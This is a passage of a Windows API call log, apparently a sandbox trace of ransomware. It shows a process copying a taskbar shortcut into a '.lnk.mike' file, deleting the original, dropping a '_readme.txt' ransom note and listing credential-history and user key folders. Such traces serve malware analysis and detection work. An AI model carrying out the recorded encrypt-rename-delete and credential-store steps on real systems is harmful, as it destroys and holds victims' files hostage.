"c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.637] GetFileType (hFile=0x1c8) returned 0x1 [0158.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0158.638] GetFileType (hFile=0x1c8) returned 0x1 [0158.638] CloseHandle (hObject=0x1c8) returned 1 [0158.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af048) returned 1 [0158.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef38) returned 1 [0158.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef34) returned 1 [0158.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0158.642] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.643] GetFileType (hFile=0x1c8) returned 0x1 [0158.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0158.643] GetFileType (hFile=0x1c8) returned 0x1 [0158.643] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef80) returned 1 [0158.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef7c) returned 1 [0158.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeec4) returned 1 [0158.645] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.645] GetFileType (hFile=0x1c8) returned 0x1 [0158.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeec0) returned 1 [0158.646] GetFileType (hFile=0x1c8) returned 0x1 [0158.646] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef54*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef54*=0) returned 0x0 [0158.646] ReadFile (in: hFile=0x1c8, lpBuffer=0x21cc480, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x21cc480*, lpNumberOfBytesRead=0x2aef60*=0x60b, lpOverlapped=0x0) returned 1 [0158.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeed4) returned 1 [0158.648] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.649] GetFileType (hFile=0x1c8) returned 0x1 [0158.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed0) returned 1 [0158.649] GetFileType (hFile=0x1c8) returned 0x1 [0158.649] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeedc) returned 1 [0158.650] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.650] GetFileType (hFile=0x1c8) returned 0x1 [0158.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeed8) returned 1 [0158.651] GetFileType (hFile=0x1c8) returned 0x1 [0158.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0158.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0158.653] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", dwFileAttributes=0x80) returned 1 [0158.653] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 1 [0158.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd0) returned 1 [0158.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefcc) returned 1 [0158.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef00) returned 1 [0158.656] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.657] GetFileType (hFile=0x1c8) returned 0x1 [0158.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeefc) returned 1 [0158.657] GetFileType (hFile=0x1c8) returned 0x1 [0158.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0158.658] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27d7f640, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27d7f640, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.659] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.659] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d0d220, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27d0d220, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27d0d220, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk.mike", cAlternateFileName="INTERN~1.MIK")) returned 1 [0158.660] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d33380, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27d33380, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27d594e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk.mike", cAlternateFileName="WINDOW~1.MIK")) returned 1 [0158.660] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7f640, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27d7f640, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27d7f640, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x830, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk.mike", cAlternateFileName="WINDOW~2.MIK")) returned 1 [0158.660] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d33380, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27d33380, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27da57a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0158.661] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d33380, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x27d33380, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x27da57a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0158.661] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0158.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0158.662] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.662] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.662] CoTaskMemFree (pv=0x508980) [0158.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0158.663] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.663] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0158.664] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0158.664] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 0 [0158.664] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0158.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0158.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0158.665] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.666] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0158.666] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0158.667] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.667] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0158.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0158.668] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.668] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.668] CoTaskMemFree (pv=0x508980) [0158.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.698] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0158.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0158.699] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.700] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0158.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0158.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0158.704] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.705] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.705] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.705] CoTaskMemFree (pv=0x508980) [0158.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0158.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.707] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0158.707] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0158.707] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0158.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0158.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0158.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0158.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.709] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0158.710] SetThreadErrorMode 